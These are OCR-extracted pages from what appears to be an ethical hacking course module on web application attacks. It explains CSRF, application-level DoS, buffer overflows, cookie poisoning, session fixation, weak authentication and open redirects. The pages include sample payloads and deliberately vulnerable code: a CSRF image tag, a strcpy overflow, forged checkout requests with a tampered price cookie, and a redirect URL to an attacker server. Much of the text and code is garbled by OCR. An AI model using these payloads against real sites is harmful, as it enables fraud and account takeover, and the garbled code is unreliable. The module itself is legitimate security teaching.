session in a coo kie in the w eb b row ser
User
C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d uctio n is S trictly Pro hibited .
C r o s s - s i t e R e q u e s t F o r g e r y ( C S R F ) A t t a c k
Cross-site request forgery is also known as a one-click attack. CSRF occurs when a
user's web brow ser is instructed to send a request to the venerable w ebsite through a
m alicious web page. CSRF vulnerabilities are very com m only found on financial-related
websites. Corporate intranets usually can't be accessed by the outside attackers so CSRF is one
of the sources to enter into the netw ork. The lack o f the web application to d ifferentiate a
request done by m alicious code from a genuine request exposes it to CSRF attack.
Cross-Site request forgery (CSRF) attacks exploit web page vulnerabilities th a t allow an attacker
to force an unsuspecting user's brow ser to send m alicious requests they did not intend. The
victim user holds an active session w ith a trusted site and sim ultaneously visits a malicious site,
which injects an HTTP request fo r the trusted site into the victim user's session, com prom ising
its integrity.
Module 13 Page 1795

Exam 312-50Certified Ethical HackerEthical Hacking and C ounterm easures
Hacking W eb A pplications
Malicious Website
browser
□ OTrusted Website
Sends a request from the user's
using his session cookie
site and
•sion
Logs into the trusted
creates a new se
er for the ‫י‬
web browser
!esslon Identffl
ookle In the
User
Stores the s
session In a cl
Visits a ma>‫י־‬
aft
F IG U R E 1 3 .2 3 : C ro s s -s ite R e q u e s t F o rg e ry (C SR F) A tta c k
Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil
All Rights Reserved. R eproduction is Strictly Prohibited.
M odule 13Page 1796

H o w C S R F A t t a c k s W o r k
In a cross-site re q u e s t fo rg e ry attack, th e a tta cker w aits fo r th e user to co nn ect to th e
tru s te d server and th e n tricks th e user to click on a m alicious link co nta in ing a rb itra ry code.
W h e n th e user clicks on th e m alicious link, th e a rb itra ry code gets executed on th e tru s te d
server. The fo llo w in g diagram explains th e step-by-step process o f a CSRF attack:
M odule 13Page 1797

Server CodeClient Side Code
r
Trusted
Server
<<?php
se ss io n _ s ta rt();
i f (isset($_REQUEST[' sym bol']
&&
is s e t ($_REQUEST [ ‫י‬shares ' ] ))
{buy_stocks ($_REQUEST[ ‫י‬symbol ‫י‬
] ,
$_REQUEST[ ’sh a res’]);}
?>
Malicious
Server
‫ט‬©
o
User logs into trusted server using his credentials
Server sets a session cookie In the user's browser
Malicious code is executed in the
trusted server
Attacker sends a phishing mall tricking
user to send a request to a malicious site
Symbol k
Shares £
<form action= buy.php"
method="POST">
<p>Symbol: <input type="text"
name-’symbor /x/p>
<p>Shares: <input type-'text"
name=,,shares” /></p>
<pxinput type="submit"
value="Buy" /></p>
</form>r
Attacker
Malicious Code
< im g
s r a = " h t t p : / / j u g g y b o y . o o ra /j
u g g y s h o p . p h p ? sym b o l= M S F T & s
h a r e s = 1 0 0 0 ,r / >
0
Response page contains malicious code
User requests a page from the malicious server
F IG U R E 1 3 .2 4 : H o w CSRF A tta c k s W o r k
M odule 13Page 1798

C E H
W e b A p p l i c a t i o n D e n i a l - o f - S e r v i c e
( D o S ) A t t a c k
Why Are Applications Vulnerable?
• Reasonable Use of Expectations
‫ג‬ Application Environment Bottlenecks
- Implementation Flaws
- Poor Data Validation
W e b S e r v i c e s U n a v a i l a b i l i t y
Attackers exhaust available server resources by
sending hundreds of resource-intensive
requests, such as pulling out large image files
or requesting dynamic pages that require
expensive search operations on the backend
database servers
W e b S e r v e r R e s o u r c e C o n s u m p t i o n
•
Targets Application-level DoS attacks emulate the
i ‫ג‬ CPU, Memory, and Sockets
: - Disk Bandwidth
:
i - Database Bandwidth
B O B
B O B
same request syntax and network-level
traffic characteristics as that of the
legitimate clients, which makes it
undetectable by existing DoS protection :
: - Worker Processes measures :
Copyright © by EG-G0llial. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b A p p l i c a t i o n D e n i a l ‫־‬ o f ‫־‬ S e r v i c e ( D o S ) A t t a c k
————‫י‬
______ Denial-of-service attacks happen w h e n th e leg itim a te users are p re vented fro m
p e rfo rm in g a desired task o r o pe ra tio n . A tta c k e rs e xh a u st available server resources by
sending h undreds o f resource-intensive requests, such as pulling o u t large image files or
requesting dyna m ic pages th a t req uire expensive search o pe ra tio n s on th e backend database
servers.
The fo llo w in g issues m ake th e w e b applications vulnerable:
© Reasonable Use o f E xpectations
© A p plica tion E n viro n m e n t Bottlenecks
© Im p le m e n ta tio n Flaws
© Poor Data V alidation
A p plica tion -le vel DoS attacks e m u la te th e same request syntax and n e tw o rk -le v e l tra ffic
characteristics as th a t o f th e leg itim a te clients, w hich makes it u n d e te c ta b le by existing DoS
p ro te c tio n measures. In w eb application denial-of-service attack th e atta cker targets and tries
to exhaust CPU, m e m o ry , Sockets, disk b a n d w id th , database b a n d w id th , and w o rk e r processes.
Som e o f th e c o m m o n w ays to p e rfo rm a w e b a p p lic a tio n DoS a tta c k are:
■ © B a nd w idth c o n s u m p tio n -flo o d in g a n e tw o rk w ith data
M odule 13Page 1799

Q R eso u rce s ta r v a tio n - d e p le t in g a s y s te m 's re s o u rc e s
© P ro g ra m m in g fla w s - e x p lo itin g b u ffe r o v e rflo w s
© R o u tin g a n d DNS a tta c k s - m a n ip u la t in g DNS ta b le s t o p o in t t o a lte rn a te IP a d dre sse s
M odule 13Page 1800

-
D e n i a l - o f - S e r v i c e ( D o S ) E x a m p l e s C E H
The attacke r could create a program th a t subm its the reg istra tio n fo rm s
repeatedly, adding a large n u m b e r o f spurio us users to th e a p p lica tion
The attacke r m ay o verlo ad the login process by co n tin u a lly sending login
requests th a t require th e p re sentation tie r to access th e a u th e n tica tio n
m echanism , rendering it u n a va ila b le o r u n re a so n a b ly slo w to respond
If a p p lic a tio n states w h ich part o f th e user nam e/passw ord pair is in co rre ct,
an a tta cke r can a u to m a te the process o f trying c o m m o n user nam es fro m a
d ic tio n a ry file to enu m erate th e users o f the a pp lica tion
The attacke r m ay enu m erate user nam es thro ugh a n o th e r vu ln e ra b ility in
the a p p lica tion and then a tte m p t to a u th e n tica te to the site using valid
user nam es and in co rre ct passw ords, w h ich w ill lock o u t th e accounts a fte r
the specified num ber o f fa ile d a tte m p ts. A t this p o in t le g itim a te users w ill
n o t be able to use th e site
Copyright © by E&C01nal.All Rights Reserved. Reproduction is Strictly Prohibited.
User
Registration DoS
Login
Attacks
User
Enumeration
Account Lock
Out Attacks
D e n i a l ‫־‬ o f ‫־‬ S e r v i c e ( D o S ) E x a m p l e
M o s t w e b a p p lic a tio n s are d e s ig n e d t o se rve o r w ith s ta n d w it h lim ite d re q u e s ts . If th e
lim it is e x c e e d e d , th e w e b a p p lic a tio n m a y fa il th e s e rv e r th e a d d itio n a l re q u e s ts . A tta c k e rs use
a d v a n ta g e to la u n c h d e n ia l-o f-s e rv ic e a tta c k s o n th e w e b a p p lic a tio n s . A tta c k e rs se n d to o m a n y
re q u e s ts t o th e w e b a p p lic a tio n u n til it g ets e x h a u s te d . O n c e th e w e b a p p lic a tio n re ce ive s
e n o u g h re q u e s ts , it sto p s r e s p o n d in g t o o th e r re q u e s t th o u g h it is s e n t b y an a u th o r iz e d user.
This is b e ca u se th e a tta c k e r o v e rrid e s th e w e b a p p lic a tio n w it h fa ls e re q u e s ts . V a rio u s w e b
a p p lic a tio n DoS a tta c k s in c lu d e :
6 User R eg istra tio n DoS: T h e a tta c k e r c o u ld c re a te a p ro g ra m t h a t s u b m its th e
re g is tra tio n fo r m s r e p e a te d ly a d d in g a large n u m b e r o f s p u rio u s users t o th e
a p p lic a tio n .
© Login A tta c k s : T h e log in p ro c e d u re is o v e rlo a d e d by th e a tta c k e r by re p e a te d ly
tr a n s fe r r in g log in re q u e s ts t h a t n e e d th e p re s e n ta tio n tie r to a d m it th e re q u e s t and
access th e v e r ific a tio n in s tru c tio n s . W h e n th e re q u e s ts a re o v e r lo a d e d , th e n th e
p ro ce ss b e c o m e s s lo w o r u n a v a ila b le t o th e g e n u in e users.
Q User E n u m e ra tio n : W h e n th e a p p lic a tio n re s p o n d s t o a n y us e r a u th e n tic a tio n p ro ce ss
w it h th e e r r o r m essa ge d e c la rin g th e area o f in c o rre c t in fo r m a tio n , th e n th e a tta c k e r
can e a sily m a n ip u la te th e p ro c e d u re b y b r u te fo r c in g th e c o m m o n u se r n a m e s f r o m a
d ic tio n a r y file to e s tim a te th e users o f t h e a p p lic a tio n .
M odule 13 Page 1801 Ethical Hacking and C ounterm easures Copyright © by EC-C0UnCil

0 A c c o u n t Lock-O ut A tta c k s : D ic tio n a ry a tta c k s can be m in im iz e d by a p p ly in g th e a c c o u n t
lo ck m e th o d . T he a tta c k e r m a y e n u m e r a te use r n a m e s th r o u g h v u ln e r a b ility in th e
a p p lic a tio n a n d th e n a t t e m p t to a u th e n tic a te th e site u sing v a lid u se r n a m e s and
in c o rre c t p a s s w o rd s t h a t w ill lo ck o u t th e a c c o u n ts a fte r th e s p e c ifie d n u m b e r o f fa ile d
a tte m p ts . A t th is p o in t, le g it im a t e u se rs w ill n o t be a b le to use th e site.
M odule 13Page 1802

B u f f e r O v e r f l o w A t t a c k s C E H
V
Vulnerable Code
int main(int argc, char *argv[]) {
char *dest_buffer;
dest_buffer = (char *) malloc(10);
if (NULL = dest_buffer)
return -1;
if (argc > 1) {
strcpy(dest_buffer, argv[1]);
printf("The first oomnand-line
argument is %s.n‫״‬, dest_buffer); )
else { printf ("No command-line
argument was given.n"); }
f ree(dest_buffer);
return 0; }
B u ffe r o v e rflo w occu rs w h e n an a p p lic a tio n
w r ite s m o re d a ta t o a b lo c k o f m e m o ry , o r
b u ffe r, th a n th e b u ffe r is a llo ca te d to h old
A b u ffe r o v e rflo w a tta c k a llo w s an a tta c k e r to
m o d ify th e ta rg e t process's add ress space in
o rd e r to c o n tro l th e process e xe cu tio n , crash
th e process, and m o d ify in te rn a l varia b le s
A tta cke rs m o d ify fu n c tio n p o in te rs used by th e
a p p lic a tio n to d ire c t p ro g ra m e x e c u tio n
th ro u g h a ju m p o r call in s tru c tio n and p o in ts it
to a lo c a tio n in th e m e m o ry c o n ta in in g
m a licio u s codes
N ote: For com plete coverage o f buffer overflow concepts and techniques, refer to M odule 18: Buffer O verflow
B u f f e r O v e r f l o w A t t a c k s
A b u ffe r has a sp e c ifie d d a ta s to ra g e c a p a c ity , a n d if th e c o u n t exce e d s th e o rig in a l,
th e b u ffe r o v e rflo w s ; th is m e a n s t h a t b u ffe r o v e r f lo w o cc u rs w h e n an a p p lic a tio n w rite s m o r e
d a ta t o a b lo c k o f m e m o ry , o r b u ffe r, th a n th e b u ffe r is a llo c a te d to h o ld . T yp ica lly , b u ffe rs a re
d e v e lo p e d to m a in ta in fin ite d a ta ; a d d itio n a l in fo r m a tio n can be d ire c te d w h e r e v e r it n e e d s to
go. H o w e v e r, e x tra in fo r m a tio n m a y o v e r f lo w in to n e ig h b o r in g b u ffe rs , d e s tr o y in g o r
o v e r w r itin g legal d a ta .
A r b i t r a r y C o d e
A b u ffe r o v e r f lo w a tta c k a llo w s an a tta c k e r to m o d ify th e ta r g e t pro ce s s's a d d re s s
space in o r d e r to c o n tr o l th e p ro ce ss e x e c u tio n , crash th e p rocess, a n d m o d ify
in te rn a l v a ria b le s . W h e n a b u ffe r o v e rflo w s , th e e x e c u tio n sta ck o f a w e b a p p lic a tio n is
d a m a g e d . A n a tta c k e r can th e n se nd s p e cia lly c ra fte d in p u t to th e w e b a p p lic a tio n , so t h a t th e
w e b a p p lic a tio n e x e c u te s th e a r b itr a r y co d e , a llo w in g th e a tta c k e r to s u c ce ss fu lly ta k e o v e r th e
m a c h in e . A tta c k e rs m o d ify fu n c tio n p o in te rs used by th e a p p lic a tio n to re d ire c t th e p ro g ra m
e x e c u tio n th r o u g h a ju m p o r call in s tru c tio n t o a lo c a tio n in th e m e m o r y c o n ta in in g m a lic io u s
co d e . B u ffe r o v e r flo w s are n o t easy t o d is c o v e r, a n d e v e n u p o n d is c o v e ry th e y a re d iffic u lt to
e x p lo it. H o w e v e r, th e a tta c k e r w h o re c o g n iz e s a p o te n t ia l b u f f e r o v e r f lo w can access a
s ta g g e rin g a rra y o f p ro d u c ts a nd c o m p o n e n ts .
M odule 13Page 1803

B u f f e r O v e r f l o w P o t e n t i a l
Both th e w e b application and server products, w hich act as static or dynam ic features
o f th e site or o f th e w e b application, contain th e p o te n tia l fo r a b u ffe r o v e rflo w error.
B uffer o v e rflo w p o te n tia l th a t is fo u n d in se rve r p ro d u c ts is c o m m o n ly kn o w n and creates a
th re a t to th e user o f th a t pro du ct. W h e n w e b applications use libraries, th e y becom e
vu ln era ble to a possible b u ffe r o v e rflo w attack.
Custom w e b application code, th ro u g h w hich a w e b application is passed, m ay also contain
b u ffe r o v e rflo w p o te n tia l. B uffer o v e rflo w errors in a cu stom w eb a pp lica tion are n o t easily
dete cte d. There are fe w e r attackers w h o find and develop such errors. If it is fo u n d in th e
cu stom application (o th e r th an crash application), th e capacity to use this e rro r is reduced by
th e fact th a t b oth th e source code and e rro r message are n o t accessible to th e attacker.
V u l n e r a b l e C o d e
i n t m a i n ( i n t a r g c , c h a r * a r g v [ ] ) {
c h a r * d e s t _ b u f f e r ;
d e s t _ b u f f e r = ( c h a r *) m a l l o c ( l O ) ;
i f (NULL == d e s t _ b u f f e r )
r e t u r n - 1 ;
i f (a rg c > 1) {
s t r c p y ( d e s t _ b u f f e r , a r g v [ l ] ) ;
p r i n t f ( " T h e f i r s t c o m m a n d -lin e a rg u m e n t i s % s . n " , d e s t _ b u f f e r ) ; }
e ls e { p r i n t f ( " N o c o m m a n d -lin e a rg u m e n t was g i v e n . n ‫״‬ ) ; } f r e e ( d e s t _ b u f f e r ) ;
r e t u r n 0; }
N ote: For co m p le te coverage o f b u ffe r o v e rflo w concepts and techniques, re fe r to M o d u le 17:
B uffer O v e rflo w Attacks.
Ethical Hacking and C ounterm easures Exam 312-50Certified Ethical Hacker

I
Cookie/Session Poisoning CEH(•rtifWd I itkitjl Nm Im
Cookies are used to maintain session state in the otherwise stateless HTTP protocol
Rewriting
the Session Data
A p ro x y c a n b e u s e d fo r
r e w r itin g t h e s e s s io n d a ta ,
d is p la y in g t h e c o o k ie d a ta ,
a n d /o r s p e c ify in g a n e w u s e r
IDo r o t h e r s e s s io n id e n tifie r s
in t h e c o o k ie
Inject the
Malicious Content
P o is o n in g a llo w s a n
a tta c k e r t o in je c t th e
m a lic io u s c o n te n t, m o d ify
t h e u s e r's o n lin e
e x p e rie n c e , a n d o b ta in t h e
u n a u th o riz e d in fo r m a tio n
Modify the
Cookie Content
C o o k ie p o is o n in g a tta c k s
in v o lv e th e m o d ific a tio n
o f t h e c o n te n ts o f a c o o k ie
(p e rs o n a l in fo r m a tio n s to re d
in a w e b u s e r's c o m p u te r ) in
o r d e r t o b y p a s s s e c u r ity
m e c h a n is m s A
C o o k i e / S e s s i o n P o i s o n i n g
Cookies fre q u e n tly tra n s m it sensitive c re d e n tia ls and can be m o d ifie d w ith ease to
escalate access or assume th e id e n tity o f a n o th e r user.
Cookies are used to m aintain a session state in th e o th e rw is e stateless HTTP p ro toco l. Sessions
are in ten de d to be uniqu ely tied to th e individual accessing th e w e b application. Poisoning o f
cookies and session in fo rm a tio n can a llo w an a tta cker to inject m alicious c o n te n t or o th e rw is e
m o d ify th e user's on-line experience and o bta in u n a u th o riz e d in fo rm a tio n .
Cookies can contain session-specific data such as user IDs, passwords, a ccou nt num bers, links
to shopping cart contents, supplied private in fo rm a tio n , and session IDs. Cookies exist as files
stored in th e client c o m p u te r's m e m o ry or hard disk. By m o d ify in g th e data in th e cookie, an
a tta cker can o fte n gain escalated access o r m aliciously affe ct th e user's session. M a n y sites
o ffe r th e a bility to "R e m e m b e r m e?" and store th e user's in fo rm a tio n in a cookie, so he or she
does n o t have to re -e n te r th e data w ith every visit to th e site. A ny private in fo rm a tio n e n te re d
is stored in a cookie. In an a tte m p t to p ro te c t cookies, site developers o fte n encode th e
cookies. Easily reversible encoding m e th o d s such as Base64 and ROT13 (ro ta tin g th e letters o f
th e a lp ha be t 13 characters) give m an y w h o v ie w cookies a false sense o f security.
M odule 13Page 1805

T hreats
The c o m p ro m is e o f cookies and sessions can p rovide an a tta cker w ith user credentials, a llow ing
th e a tta cker to access th e accou nt in o rd e r to assume th e id e n tity o f o th e r users o f an
application. By assum ing a n o th e r user's online ide ntity, th e original user's purchase history can
be review ed, n ew item s can be ord ered , and th e services and access th a t th e vu ln era ble w eb
application provides are open fo r th e a tta cker to exploit. One o f th e easiest exam ples involves
using th e cookie d irectly fo r a u th e n tic a tio n . A n o th e r m e th o d o f cookie/session poisoning uses
a proxy to re w rite th e session data, displaying th e cookie data a n d /o r specifying a n ew user ID
or o th e r session id e ntifie rs in th e cookie. Cookies can be p ersistent or n o n -p e rs is te n t and
secure o r non-secure. It can be one o f these fo u r variants. Persistent cookies are stored on a
disk and n o n -p e rs is te n t cookies are stored in m e m o ry . Secure cookies are tra n sfe rre d only
th ro u g h SSL connections.
M odule 13Page 1806

How Cookie PoisoningWorks
GET /store/buy.aspx?checkout=yes HTTP/1.0 Host www.juggyshop.com
Accept •/* Referrer: http://www.juggyshop.com/showprods.aspxCookie:
SESSIONID=325896ASDD23SA3587; BasketSize=3; lteml=1258;
. Item2=2658; Item3=6652; TotalPrice=11568;
Web server replies w ith requested
page and sets a cookie on th e user's browser
User browses a web page
GET /stor^buy.aspx?checkout*yes HTTP/1.0 Host
www.juggyshop.com Accept: •/• Referrer:
http://www.juggyshop.com/showprods.aspx Cookie:
SESSIONID*325896ASDD23SA3587; BasketSlze»3; lteml»1258;
Item2=2658; Item3«6652; TotalPrice*100;
Attacker orders fo r product using m odified cookie
Product is delivered to attacker's address
Attacker steals
cookie (Sniffing,
XSS, phishing attack)
A t ta c k e r
H o w C o o k i e P o i s o n i n g W o r k s
Cookies are m ainly used by w e b applications to sim ulate a sta teful experience
d ep en din g u pon th e end user. They are used as an id e n tity fo r th e server side o f w eb
application c o m p on en ts. This attack alters th e value o f a cookie at th e c lie n t side p rio r to th e
request to th e server. A w e b server can send a set cookie w ith th e help o f any response over
th e provided string and co m m a n d . The cookies are stored on th e user co m p u te rs and are a
standard w ay o f recognizing users. All th e requests o f th e cookies have been sent to th e w e b
server once it has been set. To provid e fu rth e r fu n c tio n a lity to th e application, cookies can be
m o d ifie d and analyzed by JavaScript.
w In this attack, th e a tta cker sniffs th e user's cookies and th e n m o d ifie s th e cookie
p aram eters and subm its to th e w e b server. The server th e n accepts th e attacker's
request and processes it.
M odule 13Page 1807

The fo llo w in g diagram clearly explains th e process o f a cookie poisoning attack:
Webserver
GET /store/buy.*1spx?checkout-yesHI IP/1.0Host: www.juggybhop.com ‫ך‬
Accept: */* Referrer: http://www.juggyshop.com/showprods.dspxCookie:
SESSIONID-32b896A$DD23SA3587; BasketSize-3;lteml-1258;
ltem2-2658; ltem3-6652; TotalPrice-11568; A
W eb se rve r rep lie s w ith requested
page and sets a cookie on th e user's b ro w s e r
U ser brow se s a w e b page
GET/store/buy.aspx?checkout=yes HTTP/1.0Host:
www.juggyshop.comAccept: */*Referrer:
http://www.juggyshop.com/showprods.aspxCookie:
SESSIONID-325896ASDD23SA3587; BasketSize=3; lteml-1258;
Item2=2658; Item36652‫־‬;TotalPrice-100;
A tta cke r o rd e rs fo r p ro d u c t using m o d ifie d cookie
P ro d u c t is d e live re d to atta cke r's address
A tta cke r steals
co o kie (S n iffin g ,
XSS, p h ish in g atta ck)
Attacker
F IG U R E 1 3 .2 5 : H o w C o o k ie P o is o n in g W o r k s
M odule 13Page 1808

C E HS e s s i o n F i x a t i o n A t t a c k
A tta c k e r assum es th e id e n tity o f th e
v ic tim a nd e x p lo its his c re d e n tia ls a t
th e s e rv e r
In a s e ssio n fix a tio n a tta c k , th e
a tta c k e r tric k s th e u s e r to access a
g e n u in e w e b s e rv e r u sin g an e x p lic it
s e ssio n ID v a lu e
S e rv e r
(juggybank.com)
| 1 g o
A A
Attacker logs on to the bank w ebsite using his credentials
W eb server sets a session ID on the attacker's machine
Attacker logs in to the server using the victim 's
credentials w ith the same session ID
h ttp : / / juggybank.dom/login.ja
p?sessionid=4321
A tta c k e r
Attacker sends an
email containing a link
with a fix session ID
User clicks on the link and is redirected to the bank w ebsite •
User logs in to the server using his credentials and fixed session ID
ItU se r
Copyright © by E&C01nal.All Rights Reserved. Reproduction isStrictly Prohibited.
S e s s i o n F i x a t i o n A t t a c k s
Session fixa tion helps an a tta cker to hijack a valid user session. In this attack, th e
a tta cker a u th e n tica te s him or herself w ith a k n o w n session ID and th e n lures th e victim to use
th e same session ID. If th e vic tim uses th e session ID sent by th e attacker, th e atta cker hijacks
th e user v a lid a te d session w ith th e k n ow led ge o f th e used session ID.
The session fixa tion attack p ro ced ure is explained w ith th e help o f th e fo llo w in g diagram :
S e rv e r
(juggybank.com )
BD O
A ttacker logs on to th e bank w e bsite using his credentials
W ebserver sets a session ID on th e attacker's machine
A ttacker logs in to th e server using th e victim 's
credentials w ith th e same session ID
h ttp : //juggybank.dom/login. js
p?sessionid=4321
Attacker
Attacker sends an
email containing a link
w ith a fix session ID
User clicks on th e link and is redirected to th e bank w e bsite
User logs in to th e server using his credentials and fixed session ID
User
FIGURE 13.26: How Cookie Poisoning W orks
M odule 13Page 1809

C E H
I n s u f f i c i e n t T r a n s p o r t L a y e r
P r o t e c t i o n
In s u ffic ie n t tra n s p o rt la ye r p ro te c tio n s u p p o rts w e a k a lg o rith m s , and
uses e x p ire d o r in v a lid c e rtific a te s
U n d e rp riv ile g e d SSL se tu p can also h elp th e
a tta cke r to launch p h ish in g a nd M IT M a tta c k s
This v u ln e ra b ility exposes u se r's data
to u n tru s te d th ir d p a rtie s and can
lead to a c c o u n t th e ft
Copyright © by E&C01nal.All Rights Reserved. Reproduction is Strictly Prohibited
I n s u f f i c i e n t T r a n s p o r t L a y e r P r o t e c t i o n
SSL/TLS a u th e n tic a tio n should be used fo r a u th e n tic a tio n on th e w ebsites o r th e
atta cker can m o n ito r n e tw o rk tra ffic to steal an a uth e n tic a te d user's session cookie.
Insufficient tra n s p o rt layer p ro te c tio n m ay a llo w u n tru s te d th ird p arties to o bta in u nauth o rized
access to sensitive in fo rm a tio n . The c o m m u n ic a tio n b e tw e e n th e w eb site and th e client should
be p ro p e rly e ncrypte d or data can be inte rce p te d , injected, o r redirected. Various th re a ts like
account th efts, phishing attacks, and a dm in accounts m ay happen a fte r systems are being
c o m p ro m is e d .
M odule 13Page 1810

C E HImproper Error Handling
J I m p r o p e r e r r o r h a n d lin g g iv e s in s ig h t in t o s o u r c e c o d e s u c h a s lo g ic f la w s ,
d e f a u lt a c c o u n ts , e tc .
U s in g t h e in f o r m a t i o n r e c e iv e d f r o m a n e r r o r m e s s a g e , a n a tta c k e r
id e n t if ie s v u ln e r a b ilit ie s
httpy/juggyboy.com/
l o o
B o y .1
General Error
Couldnotobtainpost/userInformation
DEBUGMODE
SQLErroc:1016Can'topenfile:'nuke_bbposts_text.MYO'.(errno:145)
SELECTu.username,u.userjd,u.user_posts,u.user_from,u.user_webs!te.
u.user_email,u.user_msnm,u.user_viewemail,u.user_rank,u.user_sig,
u.user_sig_bbcode_uid,u.user_alowsmile,p.*,pt.post_text,ptpost_subject
pt.bbcode.uidFROMnuke_bbpostsp,nuke_usersu,nuke_bbposts_textptWHERE
p.topicJd»1547‫'׳‬ANDpt.postJd■p.postJdANDu.userjd=p.posterjdORDERBY
p.post.tlmeASCLIMIT0,IS
Line:43S
File:/user/home/geeks/www/vonage/modules/Forums/viewtope.php
I n f o r m a t i o n G a t h e r e d
e O u t o f m e m o ry
« N u ll p o in te r e xcep tions
« S ystem call fa ilu re
® D atabase u n a va ila b le
© N e tw o rk tim e o u t
S D atabase in fo rm a tio n
a W eb a p p lic a tio n lo gical flo w
© A p p lic a tio n e n v iro n m e n t
Copyright © by E&Cauacfl.All Rights Reserved. Reproduction isStrictly Prohibited.
J J w S i I m p r o p e r E r r o r H a n d l i n g
e l Im p ro p e r e rro r handling m ay result in various types o f issues fo r a w eb site exclusively
related to security aspects, especially w he n internal e rro r messages such as stack traces,
database dum ps, and e rro r codes are displayed to th e attacker. An a tta cker can get various
details related to th e n e tw o rk version, etc. Im p ro p e r e rro r h a n d lin g gives insight into source
code such as logic flaws, d e fa u lt accounts, etc. Using th e in fo rm a tio n received fro m an e rro r
message, an a tta cker id e n tifie s v u ln e ra b ilitie s fo r launching attacks.
Im p ro p e r e rro r handling m ay a llo w an a tta cker to g ath e r in fo rm a tio n such as:
© O ut o f m e m o ry
e Null p o in te r exceptions
e System call failure
e Database unavailable
0 N e tw o rk tim e o u t
Q Database in fo rm a tio n
e W e b application logical flo w
e A p plica tion e n v iro n m e n t
M odule 13Page 1811

I n s e c u r e C r y p t o g r a p h i c S t o r a g e C E H
!. j ! I n s e c u r e C r y p t o g r a p h i c S t o r a g e
W e b applications use crypto gra ph ic a lg orith m s to e n cryp t th e ir data and o th e r
sensitive in fo rm a tio n th a t is tra n sfe rre d fro m server to client o r vice versa. The w e b application
uses c ryp to gra ph ic code to e n c ry p t th e data. Insecure crypto gra ph ic storage refers to w h e n an
application uses p oo rly w ritte n e n c ry p tio n code to securely e n cryp t and store sensitive data in
th e database.
The insecure crypto gra ph ic storage m e n tio n s th e state o f an a pplication w h e re p oo r e ncryptio n
code is used fo r securely storing data in th e database. So th e insecure data can be easily hacked
and m o d ifie d by th e a tta cke r to gain co nfid e n tia l and sensitive in fo rm a tio n such as cre d it card
in fo rm a tio n , passwords, SSNs, and o th e r a u th e n tic a tio n credentials w ith a p p ro p ria te
e ncryptio n o r hashing to launch id e n tity th e ft, cre d it card fraud, or o th e r crimes. D evelopers
can avoid such attacks by using p ro p e r a lg orith m s to e n c ry p t th e sensitive data.
The fo llo w in g pictorial rep re se n ta tio n show s th e vu ln era ble code th a t is p o o rly e n crypte d and
secure code th a t is p ro p e rly e ncrypte d using a secure c ry p to g ra p h ic a lg o rith m .
M odule 13Page 1812

F IG U R E 1 3 .2 7 : In s e c u re C r y p to g r a p h ic S to ra g e
M odule 13Page 1813

B r o k e n A u t h e n t i c a t i o n a n d
S e s s i o n M a n a g e m e n t
C E H
B A n a tta c k e r u se s v u ln e r a b ilitie s in t h e a u th e n tic a tio n o r s e s s io n m a n a g e m e n t fu n c tio n s s u c h
as e x p o s e d a c c o u n ts , s e s s io n ID s, lo g o u t, p a s s w o rd m a n a g e m e n t, t im e o u ts , r e m e m b e r m e ,
s e c re t q u e s tio n , a c c o u n t u p d a te , a n d o th e r s t o im p e r s o n a te u se rs
Timeout Exploitation
If an application's tim eouts are not set
properly and a user sim ply closes the
brow ser w ith o u t logging out from sites
accessed through a public com puter,
the attacker can use the same brow ser
la ter and exploit the user's privileges
Password Exploitation
Attacker gains access to th e w eb
application's password database.
If user passwords are not
encrypted, the attacker can
exploit every users' password
Session ID in URLs
http://juggyshop.com/sale/saleitems=30
4;jsessionid120‫־‬ MTOIDPXMOOQSABGCK
LHCJUN2JV?dest‫־‬ NewMexico
Attacker sniffs the netw o rk traffic
or tricks the user to get the
session IDs, and reuses the
session IDs fo r m alicious purposes
B r o k e n A u t h e n t i c a t i o n a n d S e s s i o n M a n a g e m e n t
A u th e n tic a tio n and session m a n a g e m e n t includes every aspect o f user a u th e n tic a tio n
and m anaging active sessions. Yet tim e s solid a u th e n tic a tio n s also fail due to w e a k c re d e n tia l
fu n c tio n s like passw ord change, fo rg o t m y password, re m e m b e r m y passw ord, account update,
etc. U tm o s t care has to be taken related to user a u th e n tic a tio n . It is always b e tte r to use strong
a u th e n tic a tio n m e th o d s th ro u g h special s o ftw a re - and hardw are-based cryp to gra ph ic to kens
or b io m e trics. An a tta cker uses vu ln era bilitie s in th e a u th e n tic a tio n o r session m a n a g e m e n t
fu n c tio n s such as exposed accounts, session IDs, logout, passw ord m an ag em en t, tim e o u ts ,
re m e m b e r me, secret question , account update, and o the rs to im p e rso n a te users.
S e s s i o n I D i n U R L s
1 , An a tta cker sniffs th e n e tw o rk tra ffic o r tricks th e user to get th e session IDs, and
reuses th e session IDs fo r m alicious purposes.
Example:
http://iuggvshop.com /sale/saleitem s=304;isessionid=120M TO ID P X M O O Q S A B G C KLH C JU N 2JV ?d
e st= N e w M e xico
M odule 13Page 1814

T i m e o u t E x p l o i t a t i o n
If an a pp lica tion 's tim e o u ts are n o t set p ro p e rly and a user sim ply closes th e b ro w se r
— w ith o u t logging o u t fro m sites accessed th ro u g h a public c o m p u te r, th e a tta cker can
use th e same b ro w s e r later and e x p lo it th e user's privileges.
g j j g n P a s s w o r d E x p l o i t a t i o n
An a tta cker gains access to th e w e b application's passw ord database. If user
passwords are n ot encrypte d , th e a tta cker can e xp lo it every users' password.
M odule 13Page 1815

C E HUrt1fw4 ilhiul lUtbM
U n v a l i d a t e d R e d i r e c t s a n d
F o r w a r d s
J U n v a lid a t e d r e d ir e c t s e n a b le a tta c k e r s t o in s ta ll m a lw a r e o r t r i c k v ic t im s in t o d is c lo s in g
p a s s w o r d s o r o t h e r s e n s itiv e in f o r m a t i o n , w h e r e a s u n s a fe f o r w a r d s m a y a llo w a c c e s s
c o n t r o l b y p a s s
Unvalidated Redirect
User is redirected to
attacker's server
M a lic io u s S e rve rU se r
Attacker sends an em ail
containing rewrite link to
m alicious server
(http://www.iuggyboy.com/redirectJspK?
=http://www.evilserver.com)
lo o hnpj‫/׳‬www,ju|C*ykhopxom/*dm1r^p
A d m inistra tion Page
I t Create price list
Q Create item listing
*1 Purchase records
£ 3 Registered users
Unvalidated Forward
Attacker is forwarded
to admin page
B6_____ ‫י‬
S e rv e r
Attacker requests page
from server w ith a forward ^
http://www.juggyshop.com/purch
